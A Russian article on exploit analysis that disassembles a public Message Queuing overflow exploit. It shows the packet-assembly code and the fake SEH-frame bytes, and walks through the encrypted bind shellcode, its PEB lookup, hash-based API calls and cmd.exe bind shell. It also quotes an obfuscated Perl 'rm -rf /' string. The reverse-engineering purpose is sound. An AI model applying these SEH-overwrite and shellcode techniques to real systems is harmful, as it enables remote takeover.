Аудит и дизассемблирование exploit'ов

         

Анализ message queuing exploit'а


Одного лишь знания ассемблера и API-операционной системы для исследования shell-кода будет явно недостаточно. Здесь все сложнее и… интереснее. Продемонстрируем технику дизассемблирования shell-кода (со всеми сопутствующими ей приемами и трюками) на примере анализа "Message Queuing Buffer Overflow Vulnerability Universal" exploit'а (http://milw0rm.com/exploits/1075), прилагаемого к статье в файле 1075. Базовый код, написанный на языке Си, рассматривать не будем, а сразу перейдем к shell'у.

Самое сложное — это определить точку входа в shell-код, то есть ту точку, которой будет передано управление при переполнении. В данном случае нам повезло и создатель exploit'а структурировал листинг, разбив двоичные данные на шесть массивов, первые четыре из которых (dce_rpc_header1, tag_private, dce_rpc_header2 и dce_rpc_header3) представляют собой заголовки RPC-пакетов, в которых для нас нет ничего интересного.

А вот массив offsets включает в себя ключевые структуры данных, передающие управление на shell-код. Способ передачи основан на подмене SEH-фреймов по усовершенствованной методике, обходящей защиту от переполнения, появившуюся в Windows 2000, Windows XP и Server 2003. И хотя это не отражено в комментариях явным образом (создатели shell-кодов традиционно неразговорчивы), опытные кодокопатели распознают подложные фреймы с первого взгляда (тем более, что кое-какие комментарии там все-таки присутствуют, но даже если бы их и не было, это не сильно бы затруднило анализ).

Основная часть shell-кода (расположенная в массиве bind_shellcode) системно независима (ну, почти), а все фиксированные адреса вынесены в массив offset, который при тестировании под различными версиями операционных систем имеет наглость требовать "ручной" коррекции. Даже при наличии не залатанной дыры exploit может не работать только потому, что по фиксированным адресам расположено не то, что ожидалось. Но, прежде, чем приступать к анализу массива offsets, необходимо определить его местоположение в пакете-убийце, вызывающим переполнение. Приведенный ниже фрагмент базового кода собирает все массивы в непрерывный буфер, передаваемый на атакуемый сервер:

// выделяем память

buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff;

// RPC-заголовки

memcpy(ptr,dce_rpc_header1,sizeof(dce_rpc_header1)-1);ptr+=sizeof(dce_rpc_header1)-1;

memcpy(ptr, tag_private, sizeof(tag_private)-1);       ptr+=sizeof(tag_private)-1;

memcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);

memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);

memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

// offsets

ptr=buff;ptr+=438;

memcpy(ptr, offsets, sizeof(offsets)-1);ptr += sizeof(offsets)-1;

// shellcode

memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);



Аудит и дизассемблирование exploit'ов




exploit'ы, демонстрирующие наличие дыры (proof-of-concept), обычно распространяются в исходных текстах, однако, основной функционал заключен в shell-коде, анализ которого представляет весьма нетривиальную задачу, требующую инженерного склада ума, развитой интуиции, обширных знаний и… знания специальных приемов дизассемблирования, о которых и пойдет речь в этой статье.



Как препарируют exploit'ы


Основной код exploit'а, как правило, пишется на переносимом высокоуровневом языке таком как Си/Си++, Perl, Python. Экзотика типа Ruby встречается намного реже, но все-таки встречается. В практическом плане это означает, что администратор ### кодокопатель должен владеть десятком популярных языков хотя бы на уровне беглого чтения листингов. Впрочем, в девяти из десяти случаев, ничего интересного в них не встречается, и весь боевой заряд концентрируется в "магических" строковых массивах, оформленных в стиле "\x55\x89\xE5…\xC7\x45\xFC". Вот это и есть shell-код в ASCII-представлении. Высокоуровневый код— всего лишь обертка, образно говоря, тетива или пусковая установка, а shell-код — разящие острие.

Достаточно многие исследователи допускают роковую ошибку: анализируя shell-код, они забывают о том, что основной код может содержать вредоносные инструкции наподобие "rm -rf /". При знании языка, пакости подобного типа обнаруживаются без труда, если, конечно, злоумышленник не стремился воспрепятствовать анализу. Существует масса способов замаскировать вредоносный код в безобидные конструкции. Взять хотя бы строку '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see', разворачиваемую Perl'ом в команду "rm -rf /", которая при запуске из-под root'а уничтожает все содержимое диска целиком.

Отсюда вывод: никогда не запускайте на выполнение код, смысла которого до конца не понимаете и уж тем более не давайте ему администраторских полномочий! Не поддавайтесь на провокацию!

Даже на авторитетных сайтах проскакивают exploit'ы, созданные с одной-единственной целью — отомстить если не всему человечеству, то хотя бы его части. Помните, что самая большая дыра в системе — это человек, знающий пароль root'а (администратора) и запускающий на рабочей машине все без разбора!

Больше на анализе базового кода мы останавливаться не будем (если вы знаете язык — это тривиально, если нет — не надейтесь, что автору удалось уложить многостраничные руководства в скромные рамки журнальной статьи ### главы).



фрагмент exploit'а, ответственный за сборку пакета-убийцы


Вначале пакета (см. рис. 1) располагается RPC-заголовок dce_rpc_header1, за ним идет NetBIOS-имя атакуемого узла и тег private. На некотором отдалении от начала заголовка, по смещению 438 (1B6h) лежит массив offsets, сразу за концом которого идет shell-код. Далеко за ним обнаруживается еще один RPC-заголовок dce_rpc_header2 и dce_rpc_header3

(на рисунке не показан). Все остальное пространство пакета заполнено командами NOP (90h).

Процесс формирования пакета хорошо наблюдать под отладчиком (в данном случае использовался Microsoft Visual Studio Debugger) или перехватить уже готовый пакет sniffer'ом.



массив offsets хранит


В начале массива расположена довольно характерная структура, состоящая из двух двойных слов, первое из которых включает в себя двухбайтовую команду безусловного перехода JMP SHORT (опкод— EBh), дополненную до двойного слова парой NOP'ов (впрочем, поскольку, они все равно не исполняются, здесь может быть все, что угодно). Следующее двойное слово указывает куда-то вглубь адресного пространства — 004014E9h и, судя по значению, принадлежит прикладному приложению. В данном случае — программе mqsvc.exe, реализующей службу Message Queuing. Комментарий, заботливо оставленный создателем exploit'а, говорит, что по этому адресу он ожидает увидеть конструкцию pop reg/pop reg/retn. Это — классическая последовательность, используемая для передачи управления через подложные SEH-фреймы, подробно описанная в статье "Эксплуатирование SEH в среде Win32" (http://www.securitylab.ru/contest/212085.php), написанной houseofdabus'ом. Он же написал и разбираемый нами exploit.

Допустим, никакого комментария у нас бы не было. И что тогда? Загружаем mqsvc.exe в hiew, двойным нажатием ENTER'а переходим в дизассемблерный режим, давим <F5>
и вводим адрес ".4014E9" (точка указывает, что это именно адрес, а не смещение).

Видим:

.004014E9: 5F pop    edi    ; вытолкнуть одно двойное слово из стека

.004014EA: 5E pop    esi    ; вытолкнуть следующее двойное слово

.004014EB: C3 retn          ; выткнуть адрес возврата и передать по нему управление



последовательность pop reg/pop reg/retn, содержащаяся в mqsvc.exe файле


Естественно, данный способ не универсален и вообще говоря ненадежен, поскольку, в другой версии mqsvc.exe адрес "магической" последовательности наверняка будет иной, хотя в Windows 2000 Home, Windows 2000 Professional, Windows 2000 Server/AdvServer адреса совпадают, поскольку используется одна и та же версия mqsvc.exe, а вот в Windows XP адрес уже "уплывает".

Интуитивно мы чувствуем, что передача управления на shell-код осуществляется через RET, но остается непонятным каким образом указатель на shell-код мог очутиться в стеке, ведь никто туда его явно не засылал! Запихать в переполняющийся буфер можно все, что угодно, но при этом придется указать точный адрес размещения shell-кода в памяти, а для этого необходимо знать значение регистра ESP на момент атаки, а оно в общем случае неизвестно.

Структурные исключения позволяют элегантно решить эту задачу. Вместо того, чтобы затирать адрес возврата (как делало это целое поклонение кодокопателей), мы подменяем оригинальный SEH-фрейм атакуемой программы своим. Теоретически, SEH-фреймы могут быть расположены в любом месте, но практически все известные компиляторы размещают их в стеке, на вершине кадра функции, то есть по соседству с сохраненным EPB и RET'ом:

.text:0040104D             push   ebp                  ; открыть новый...

.text:0040104E             mov    ebp, esp             ;             ...кадр

стека

.text:00401050             push   0FFFFFFFFh           ; это последний SEH-фрейм

.text:00401052             push   offset stru_407020   ; предшествующий SEH-обработчик

.text:00401057             push   offset _except_handler3; новый SEH-обработчик

.text:0040105C             mov    eax, large fs:0      ; получить указатель на SEH-фрейм

.text:00401062             push   eax                  ; предыдущий SEH-обработчик

.text:00401063             mov    large fs:0, esp      ; зарегистрировать новый SEH-фрейм



фрагмент функции, формирующий новый SEH-фрейм (компилятор — Microsoft Visual C++)


Отсюда: если мы можем затереть адрес возврата, подмена SEH-фрейма не составит никаких проблем!



структура SEH-фреймов


Первое двойное слово указывает на предыдущий SEH-фрейм в цепочке (если текущий обработчик не знает, что делать с исключением, он отдает его предыдущему обработчику; если ни один из обработчиков не может обработать исключение, операционная система выбрасывает знаменитое сообщение о критической ошибке и завершает работу приложения в аварийном режиме).

Следующее двойное слово — содержит адрес процедуры обработчика исключений (не путать с функцией-фильтром исключений, которая обслуживаться не операционной системой, а компилятором!). Очень заманчиво записать сюда указатель на shell-код, но вся проблема в том, что этого указателя мы не знаем и в общем случае не можем узнать! На самом деле, ситуация не так уж плачевна.

Рассмотрим процесс обработки исключений повнимательнее. В тот момент, когда прикладной код пытается сделать что-то недопустимое, процессор генерирует прерывание. Операционная система перехватывает его и передает внутренней функции KiUserExceptionDispatcher, содержащейся внутри NTDLL.DLL. Та в свою очередь вызывает промежуточную функцию RtlUnwind

(все из той же NTDLL.DLL), передающую управление фильтру исключений, установленным компилятором (в случае Microsoft Visual C++ эта функция называется __except_handler3), которая и вызывает прикладной обработчик, зарегистрированный программистом уязвимого приложения.

Короче, получается следующая цепочка вызовов:

NTDLL.DLL!KiUserExceptionDispatcher ->
NTDLL.DLL!RtlUnwind —>
__except_handler3



последовательность вызова функций при обработке исключения


В Windows 2000 функция NTDLL.DLL!RtlUnwind

оставляет немного "мусора" в регистрах, в результате чего в EBX попадет адрес текущего SEH-фрейма. А это значит, что для достижения задуманной цели мы должны поверх handler'а поместить указатель на команду JMP EBX (FFh E3h) или CALL EBX (FFh D3h), которую можно найти как в самой атакуемой программы, так и в памяти операционной системы (естественно, адрес будет "плавать" от версии к версии, что есть неизбежное зло, но с этим надо смириться). Тогда при возникновении исключения управление будет передано на двойное слово, содержащее указатель prev. Да-да! Не по указателю prev, а именно на сам указатель, который следует заменить на JMP SHORT sell?code. Поскольку, команды перехода в x86-процессорах относительные, знать точное расположение shell-кода в памяти уже необязательно.

В Windows XP эта лазейка была прикрыта, но! Осталась функция-фильтр __except_handler3, входящая в состав RTL компилятора, а потому никак не зависящая от операционной системы. Рассмотрим окрестности дизассемблерного кода, передающего управление на зарегистрированный программистом обработчик.

.text:004012D1             mov    esi, [ebx+0Ch]             ; указатель на текущий SEH-фрейм

.text:004012D4             mov    edi, [ebx+8]

.text:004012D7

.text:004012D7 unknwn_libname_2:                ; CODE XREF: unknwn_libname_1+90vj

.text:004012D        cmp    esi, 0FFFFFFFFh      ; обработчиков больше нет?

.text:004012DA             jz     short unknwn_libname_5     ; если да, завершаем программу

.text:004012DC             lea    ecx, [esi+esi*2]

.text:004012DF             cmp    dword ptr [edi+ecx*4+4], 0

.text:004012E4             jz     short unknwn_libname_3 ; Microsoft VisualC 2-7/net

.text:004012E6             push   esi                  ; сохраняем указатель на фрейм

.text:004012E7             push   ebp                  ; сохраняем указатель на кадр

.text:004012E8             lea    ebp, [ebx+10h]

.text:004012EB             call   dword ptr [edi+ecx*4+4]; вызываем обработчик исключения

.text:004012EF             pop    ebp                  ; восстанавливаем кадр

.text:004012F0             pop    esi                  ; восстанавливаем фрейм



фрагмент RTL-функции


Вот оно! Перед вызовом обработчика исключения, функция временно сохраняет указатель на текущий SEH-фрейм в стеке (команда PUSH ESI), который на момент вызова обработка будет расположен по смещению +8h. Причем, исправить это средствами операционной системы никак невозможно! Необходимо переписать RTL каждого из компиляторов и перекомпилировать все программы!

Для реализации атаки достаточно заменить handler указателем на последовательность pop reg/pop reg/ret или add esp, 8/ret (которая достаточно часто встречаются в эпилогах функций), а поверх prev как и раньше записать jump на shell-код. Первая команда pop сталкивает с вершины стека уже ненужный адрес возврата, оставленный call, вторая — выбрасывает сохраненный регистр EBP, а ret передает управление на текущий SEH-фрейм.

Теперь структура массива offsets

становится более или менее понятна. Мы видим три подложных SEH-фрейма — по одному для каждой операционной системы, расположенных в памяти с таким расчетом, чтобы они совпадали с текущими SEH-фреймами атакуемой программы. Это самая капризная часть exploit'а, поскольку дислокация фреймов зависит как от версии атакуемой программы (добавление или удаление локальных переменных внутри уязвимой функции изменяет расстояние между фреймом и переполняющимся буфером), так и от начального положения стека на момент запуска программы (за это отвечает операционная система). В дополнении к этому необходимо следить за тем, чтобы handler

действительно указывал на pop reg/pop reg/ret (add esp,8/ret), а не на что-то другое. В противном случае, exploit работать не будет, но если все значения подобранны правильно, управление получит bind_shellcode, который мы сейчас попробуем дизассемблировать, но прежде необходимо перевести ASCII-строку в двоичный вид, чтобы его "проглотил" hiew или IDA PRO.

Вместо того, чтобы писать конвертор с нуля, воспользуемся возможностями компилятора языка Си, написав несложную программу, состоящую фактически всего из одной строки (остальные — объявления):

#include <stdio.h>

char shellcode[]="\xXX\xXX\xXX\xXX";     // сюда помещаем массив для преобразования

main(){FILE *f;if(f=fopen("shellcode","wb"))fwrite(shellcode, sizeof(shellcode),1,f);
}



программа, сохраняющая


Выделяем массив bind_shellcode

и копируем в нашу программу, по ходу дела переименовывая его в shellcode. Компилируем с настройками по умолчанию, запускаем. На диске образуется файл shellcode, готовый к загрузке в IDA Pro или hiew (только не забудьте переключить дизассемблер в 32-разрядный режим!).

Начало дизассемблерного листинга выглядят так:

00000000: 29C9                    sub    ecx,ecx              ; ECX := 0

00000002: 83E9B0           sub    ecx,-050      ; EBX := 50h

00000005: D9EE                    fldz                 ; загрузить +0.0 на стек FPU

00000007: D97424F4         fstenv [esp][-0C]   ; сохранить среду FPU в памяти

0000000B: 5B               pop    ebx           ; EBX := &fldz

0000000C: 81731319F50437   xor    d,[ebx][13],03704F519

0000000C                                        ; ^расшифровываем двойными словами

00000013: 83EBFC           sub    ebx,-004      ; EBX += 4:следующее двойное слово

00000016: E2F4                    loop   00000000C  (1)       ; мотаем цикл

00000018: E59F                    in     eax,09F              ; зашифрованная команда

0000001A: EF               out    dx,eax        ; зашифрованная команда



в начале shell-кода расположен расшифровщик, расшифровывающий весь остальной код


Первые 8 команд более или менее понятны, а вот дальше начинается явный мусор, типа инструкций IN и OUT, которые при попытке выполнения на прикладном режиме возбуждают исключение. Тут что-то не так! Либо точка входа в shell-код начинается не с первого байта (но это противоречит результатам наших исследований), либо shell-код зашифрован. Присмотревшись к первым восьми командам повнимательнее, мы с удовлетворением обнаруживаем тривиальный расшифровщик в лице инструкции XOR, следовательно, точка входа в shell-код определена нами правильно и все, что нужно — это расшифровать его, а для этого мы должны определить значение регистров EBX и ECX, используемых расшифровщиком.

С регистром ECX разобраться несложно — он инициализируется явно, путем нехитрых математических преобразований: sub ecx,ecxàecx:=0; sub ebx,-50hàadd ecx,50hàecx := 50h, то есть на входе в расшифровщик ECX будет иметь значение 50h – именно столько двойных слов нам предстоит расшифровать.

С регистром EBX все обстоит намного сложнее и чтобы вычислить его значение, необходимо углубиться во внутренние структуры данных сопроцессора. Команда FLDZ помещает на стек сопроцессора константу +0.0, а команда FSTENV сохраняет текущую среду сопроцессора по адресу [esp-0Ch]. Открыв "Intel Architecture Software Developer's Manual Volume 2: Instruction Set Reference", среди прочей полезной информации мы найдем и сам формат среды FPU:

FPUControlWord                    ß SRC(FPUControlWord);

FPUStatusWord               ß SRC(FPUStatusWord);

FPUTagWord                 ß SRC(FPUTagWord);

FPUDataPointer                    ß SRC(FPUDataPointer);

FPUInstructionPointer             ß SRC(FPUInstructionPointer);

FPULastInstructionOpcode   ß SRC(FPULastInstructionOpcode);



псевдокод команды fstenv, сохраняющей среду FPU


Наложив эту структуру на стек, мы получим вот что:

->
- fstenv ->
- 0Ch  FPUControlWord

              - 08h  FPUStatusWord

              - 04h  FPUTagWord

->
--- esp --->
         00h  FPUDataPointer

<- pop ebx -<-       + 04h  FPUInstructionPointer

              + 08   FPULastInstructionOpcode



карта размещения среды в стековой памяти


Из этой схемы видно, что команда POP EBX выталкивает в регистр EBX адрес последний FPU-инструкции, которой и является FLDZ, расположенной по смещению 5h (условно). При исполнении на "живом" процессоре смещение будет наверняка другим и чтобы не погибнуть, shell-код должен определить где именно он располагается в памяти. Разработчик shell-кода применил довольно необычный подход, в то время как подавляющее большинство ограничивается тупым CALL/POP REG. Сложив полученное смещение 5h с константой 13h, фигурирующей в инструкции XOR, мы получим 18h – адрес первого зашифрованного байта.

Зная значения регистров, нетрудно расшифровать shell-код. В IDA Pro для этого достаточно написать следующий скрипт:

auto a,x;                                // объявление переменных

for(a = 0; a < 0x50; a++)                // цикл расшифровки

{

       x=Dword(MK_FP("seg000",a*4+0x18));
// читаем очередной двойное слово

       x

=  x ^ 0x3704F519;              // расшифровываем

       PatchDword(MK_FP("seg000",a*4+0x18),x);
//записываем расшифрованное значение

}



скрипт для IDA Pro, расшифровывающий shell-код


Нажимаем <Shift-F2>
, в появившимся диалоговом окне вводим вышеприведенный код, запуская его на выполнение по <Ctrl-Enter>
. В hiew'е расшифровка осуществляется еще проще. Открываем файл shellcode, однократным нажатием ENTER'а переводим редактор в hex-режим, подводим курсор к смещению 18h — туда, где кончается расшифровщик и начинается зашифрованный код (см. листинг 9), переходим в режим редактирования по <F3>
, давим <F8>
(Xor) и вводим константу шифрования, записанную с учетом порядка байтов на x86 задом наперед: 19h F5h 04h 37h и жмем <F8>
до тех пор пока курсор не дойдет до конца файла. Сохраняем изменения клавшей <F9>
и выходим.



древний антидизассемблерный трюк — прыжок в середину команды


Команда "CALL LOC_19+1" прыгает куда-то в середину инструкции PUSH, засылающей в стек константу FFFFFFEBh в которой опытные кодокопатели уже наверняка увидели инструкцию безусловного перехода, заданную опкодом EBh, а вся команда выглядит так: EBh 4Dh, где 4Dh "отрываются" от инструкции DEC EBP. Важно не забывать, что PUSH

с опкодом 6Ah — это знаковая команда, то есть никаких FFh в самом опкоде нет, поэтому вместо перехода по адресу EBh FFh (как это следует из дизассемблерного текста) мы получаем переход по адресу EBh 4Dh (как это следует из машинного кода), что совсем не одно и тоже! Сам переход, кстати говоря, относительный и вычисляется от конца команды JMP, длина которой в данном случае равна двум. Складываем 4Dh (целевой адрес перехода) с 1Ah (адрес самой команды перехода — loc_19 + 1 = 1Ah) и получаем 69h. Именно по этому смещению и будет передано управление! А команды, идущие за инструкцией CALL,

расположены чисто для маскировки, чтобы противник подольше голову поломал.

Хорошо, отправляется в район 69h и смотрим что хорошего у нас там:

seg000:00000069 31 DB             xor    ebx, ebx      ; ebx := 0

seg000:0000006B 64 8B 43 30 mov    eax, fs:[ebx+30h] ; PEB

seg000:0000006F 8B 40 0C   mov    eax, [eax+0Ch]       ; PEB_LDR_DATA

seg000:00000072 8B 70 1C   mov    esi, [eax+1Ch]       ; InInitializationOrderModuleList

seg000:00000075 AD         lodsd                ; EAX := *ESI

seg000:00000076 8B 40 08   mov    eax, [eax+8]  ; BASE of KERNEL32.DLL



код, вычисляющий базовый адрес KERNEL32.DLL через PEB


С первой командой, обнуляющей EBX через XOR, все понятно. Но вот вторая… что-то считывает из ячейки, лежащей по адресу FS:[EBX+30]. Селектор FS указывает на область памяти, где операционная система хранит служебные (и практически никак недокументированные) данные потока. К счастью в нашем распоряжении есть Интернет. Набираем в Гугле "fs:[30h]" (с кавычками!) и получаем кучу ссылок от рекламы картриджей TK-30H до вполне вменяемых материалов, из которых мы узнаем, что в ячейке FS:[30h] хранится указатель на Process Enviroment Block – Блок Окружения Процесса или, сокращенно, PEB.

Описание самого PEB'а (как и многих других внутренних структур операционной системы) можно почерпнуть из замечательной книги "The Undocumented Functions Microsoft Windows NT/2000", электронная версия которой доступа по адресу http://undocumented.ntinternals.net/.

Из нее мы узнаем, что по смещению 0Ch от начала PEB лежит указатель на структуру PEB_LDR_DATA, по смещению 1Ch от начала которой лежит список. _не_ указатель на список, а сам список, состоящий из двух двойных слов: указателя на следующий LIST_ENTRY и указателя на экземпляр структуры LDR_MODULE, перечисленные в порядке инициализации модулей, а первым, как известно, инициализируется KERNEL32.DLL.

/* 00 */ ULONG                    Length;

/* 04 */ BOOLEAN           Initialized;

/* 08 */ PVOID                    SsHandle;

/* 0C */ LIST_ENTRY        InLoadOrderModuleList;

/* 14 */ LIST_ENTRY        InMemoryOrderModuleList;

/* 1C */ LIST_ENTRY        InInitializationOrderModuleList;



недокументированная структура PEB_LDR_DATA


Описание самой структуры LDR_MODULE выглядит так (кстати говоря, в "The Undocumented Functions Microsoft Windows NT/2000" допущена грубая ошибка — пропущен union):

typedef struct _LDR_MODULE {

union order_type

{

/* 00 */ LIST_ENTRY        InLoadOrderModuleList;

/* 00 */ LIST_ENTRY         InMemoryOrderModuleList;

/* 00 */ LIST_ENTRY         InInitializationOrderModuleList;

}

/* 08 */ PVOID                    BaseAddress;

/* 0C */ PVOID                    EntryPoint;

/* 10 */ ULONG                    SizeOfImage;

/* 14 */ UNICODE_STRING    FullDllName;

/* 18 */ UNICODE_STRING    BaseDllName;

/* 1C */ ULONG                    Flags;

/* 20 */ SHORT                    LoadCount;

/* 22 */ SHORT                    TlsIndex;

/* 24 */ LIST_ENTRY        HashTableEntry;

/* 28 */ ULONG                    TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;



недокументированная структура LDR_MODULE


Самая трудная часть позади. Теперь мы точно знаем, что EAX содержит базовый адрес KERNEL32.DLL. Продолжаем анализировать дальше.

seg000:00000079 5E                pop    esi           ; esi := &MyGetProcAddress

seg000:0000007A 68 8E 4E 0E EC    push   0EC0E4E8Eh    ; #LoadLibraryA

seg000:0000007F 50                push   eax           ; base of KERNEL32.DLL

seg000:00000080 FF D6                    call   esi           ; MyGetProcAddress



вызов API-функции по хэш-именам


Команда POP ESI выталкивает в регистр ESI двойное слово, лежащее на вершине стека. А что у нас там? Помните команду CALL, передающую управление хитрой инструкции JMP? Она положила на стек адрес возврата, то есть адрес следующей за ней команды, равный в данном случае 021h, который тут же и вызывается инструкцией CALL ESI, принимающий два аргумента — базовый адрес KERNEL32.DLL, передаваемый в регистре EAX и непонятную константу 0EC0E4E8Eh.

seg000:00000021 60         pusha                      ; сохраняем все регистры

seg000:00000022 8B 6C 24 24 mov    ebp, [esp+24h]       ; base of KERNEL32.DLL

seg000:00000026 8B 45 3C   mov    eax, [ebp+3Ch]       ; PE header

seg000:00000029 8B 7C 05 78 mov    edi, [ebp+eax+78h]   ; export table RVA

seg000:0000002D 01 EF             add    edi, ebp             ; адрес

таблицы экспорта

seg000:0000002F 8B 4F 18   mov    ecx, [edi+18h]             ; numberOfNamePointers

seg000:00000032 8B 5F 20   mov    ebx, [edi+20h]             ; namePointerRVA

seg000:00000035 01 EB             add    ebx, ebp             ; namePointer VA

seg000:00000037

seg000:00000037 loc_37:                         ; CODE XREF: seg000:00000050vj

seg000:00000037 49          dec    ecx           ; обрабатываем след. имя

seg000:00000038 8B 34 8B   mov    esi, [ebx+ecx*4]; RVA-адрес функции

seg000:0000003B 01 EE             add    esi, ebp      ; вирт. адрес функции

seg000:0000003D 31 C0             xor    eax, eax      ; EAX := 0

seg000:0000003F 99         cdq                  ; EDX := 0

seg000:00000040

seg000:00000040 loc_40:                         ; CODE XREF: seg000:0000004Avj

seg000:00000040 AC         lodsb                ; читаем очередной байт имени

seg000:00000041 84 C0             test   al, al        ; это конец имени?

seg000:00000043 74 07             jz     short loc_4C  ; если конец, выходим из цикла

seg000:00000045 C1 CA 0D   ror    edx, 0Dh      ; \_ хэшируем

seg000:00000048 01 C2             add    edx, eax      ; /           имя



мотаем цикл


seg000:0000004A EB F4             jmp    short loc_40  ; мотаем цикл

seg000:0000004C

seg000:0000004C loc_4C:                         ; CODE XREF: seg000:00000043^j

seg000: 0000004C 3B 54 24 28 cmp    edx, [esp+28h]       ; это "наш" хэш?

seg000:00000050 75 E5             jnz    short loc_37  ; продолжаем поиск если не наш

seg000:00000052 8B 5F 24   mov    ebx, [edi+24h]       ; ordinalTableRVA

seg000:00000055 01 EB             add    ebx, ebp      ; ordinalTable VA

seg000:00000057 66 8B 0C 4B mov    cx, [ebx+ecx*2]; index

seg000:0000005B 8B 5F 1C   mov    ebx, [edi+1Ch]       ; exportAddressTableRVA

seg000:0000005E 01 EB             add    ebx, ebp      ; exportAddressTable VA

seg000:00000060 03 2C 8B   add    ebp,[ebx+ecx*4]; вот она наша функция!!!

seg000:00000063 89 6C 24 1C mov    [esp+1Ch], ebp

; сохраняем в EAX

seg000:00000067 61         popa                 ; восстанавливаем регистры

seg000:00000068 C3         retn                 ; возвращаемся из функции


процедура MyGetProcAddress, возвращающая адрес API-функции по хэш-сумме его имени


Зная базовый адрес загрузки KERNEL32.DLL (он передается функции через стек и лежит по смещению 24h байта от вершины — остальное пространство занимают регистры, сохраненные командой PUSHA), программа получает указатель на PE-заголовок, откуда извлекает указатель на таблицу экспорта, считывая общее количество экспортируемых имен (numberOfNamePointers) и RVA-указатель на массив с именами, который тут же преобразуется в эффективный виртуальный адрес путем сложения с базовым адресом загрузки KERNEL32.DLL.

А вот дальше… дальше начинается самое интересное! Для каждого из экспортируемых имен функция вычисляет хэш, сравнивая его с тем "загадочным" числом. Если они совпадают, искомая API-функция считается найденной и возвращается ее виртуальный адрес. Таким образом, данный код представляет собой аналог функции GetProcAddress, только с той разницей, что он принимает не ASCII-имя функции, а его 32-битный хэш. Условимся называть эту процедуру MyGetProcAddress.

Можно ли восстановить имя функции по ее хэшу? С математической точки зрения — навряд ли, но что мешает нам запустить shell-код под отладчиком (см. одноименную врезку) и "подсмотреть" возвращенный виртуальный адрес, по которому имя определяется без проблем!

Сказано сделано! Немного протрассировав программу до строки 82h, мы обнаруживаем в регистре EAX число 79450221h (зависит от версии системы на вашей машине наверняка будет иным). Нормальные отладчики (типа OllyDbg) тут же покажут имя функции LoadLibraryA. Как вариант, можно воспользоваться утилитой DUMPBIN из Platform SDK, запустив ее со следующими ключами: "dumpbin KERNEL32.DLL /EXPORTS >
 kernel32", только помните, что она показывает относительные RVA-адреса, поэтому необходимо либо добавить к ним базовый адрес загрузки KERNEL32.DLL, либо вычесть его из адреса искомой функции.

seg000:00000082 66 53                    push   bx            ; \

seg000:00000084 66 68 33 32       push   small 3233h   ;  + - "ws2_32"

seg000:00000088 68 77 73 32 5F    push   5F327377h     ; /

seg000:0000008D 54                push   esp           ; &"ws2_32"

seg000:0000008E FF D0                    call   eax           ; LoadLibraryA

seg000:00000090 68 CB ED FC 3B    push   3BFCEDCBh     ; WSAStartup

seg000:00000095 50                push   eax           ;

seg000:00000096 FF D6                    call   esi           ; MyGetProcAddress



загрузка библиотеки ws2_32 для работы с сокетами и ее инициализация


Имя в своем распоряжении функцию LoadLibraryA, shell-код загружает библиотеку ws_2_32 для работы с сокетами, имя которой передается непосредственно через стек и завершается двумя нулевыми байтами (хотя было бы достаточно и одного), формируемого командой PUSH BH (как мы помним, несколькими строками выше, EBX был обращен в ноль — см. листинг 9). PUSH BH

это двухбайтовая команда, в то время как PUSH EBX – однобайтовая. Но не будем придираться по мелочам.

Процедура MyGetProcAddress

снова принимает "магическое" число 3BFCEDCBh, которое после расшифровки под отладчиком оказывается API-функций WSAStartup, вызов которой совершенно неоправдан, поскольку для инициализации библиотеки сокетов ее достаточно вызвать один-единственный раз, что уже давно сделало уязвимое приложение, иначе как бы мы ухитрились его удаленно атаковать?

Последовательность последующих вызовов вполне стандартна: WSASocketA(2, 1, 0,0,0,0) à bind(s, {sockaddr_in.2; sin_port.0x621Eh}, 0x10) à listen(s,2) à accept

(s, *addr, *addrlen) à closesocket(s).

Дождавшись подключения на заданный порт, shell-код считывает ASCII-строку, передавая ее командному интерпретатору cmd.exe по следующей схеме: CreateProcessA(0, "cmd...", 0,0, 1,0,0,0, lpStartupInfo, lpProcessInformation) à WaitForSingleObject(hProc, -1) à ExitThread(0).

Злоумышленник может запускать любые программы и выполнять пакетные команды, что дает ему практически неограниченную власть над системой, разумеется, если брандмауэр будет не прочь, но про обход брандмауэров уже неоднократно писали.



устройство пакета-убийцы, передаваемого на атакуемый сервер


Сразу же возникает вопрос — в каком именно месте возникает переполнение и каким именно образом происходит передача управления на shell-код? Запустив MSMQ-службу под отладчиком, мы увидим, что массив offsets

ложится аккурат поверх SEH-фрейма, подменяя его содержимое, а shell-код затирает адрес возврата из функции, заменяя RET произвольным адресом, указывающим в "космос", при обращении к которому возбуждается исключение и… управление получает подложный SEH-фрейм, передающий управление на shell-код. Все просто! Главное — отладчик иметь! И… установленную службу Message Queuing, которой в распоряжении кодокопателя может и не быть. К тому же мы договорились, прежде чем запускать exploit (пусть даже под отладчиком!) сначала реконструировать его алгоритм.

А как мы его можем реконструировать? Хорошая головоломка для знатоков! Отбросив RPC-заголовки, мы остаемся только с массивом offsets

и shell-кодом. Очевидно, смещение массива offsets

выбрано не случайно и играет в переполнении ведущую роль, поскольку bind_shellcode

представляет собой вполне "стандартный" shell-код, встречающийся во многих других exploit'ах и совпадающий с ним байт-в-байт.

Рассмотрим массив offsets

поближе:

unsigned char offsets[] =

/* entry point (jmp over) */                    ; // SEH-FRAME for Windows 2000

"\xEB\x08\x90\x90"                       ; // ! *prev | jmp lab_0Ah    !

/* mqsvc.exe - pop reg; pop reg; retn; */       ; // !------------------------!

"\xE9\x14\x40\x00"                       ; // !  *handler              !

                                         ; // !------------------------!

"\x90\x90\x90\x90\x90\x90\x90\x90"       ; // подбор SEH-фрейма для w2k server

/* :LAB_0Ah */

/* entry point (jmp over) */                    ; // SEH-FRAME for W2K Server/AdvServer

"\xEB\x08\x90\x90"                       ; // ! *prev | jmp lab_1Ah            !

/* mqsvc.exe - pop reg; pop reg; retn; */       ; // !----------------- --------------!



расположение SEH-фреймов относительно переполняющихся буферов


Сама структура фреймов проста до безобразия:

struct EXCEPTION_REGISTRATION

{

/* 00h */ EXCEPTION_REGISTRATION  *prev;        // предыдущий SEH-фрейм

/* 04h */ DWORD                   *handler;     // обработчик исключения

};



расшифровка shell-кода в hiew'e


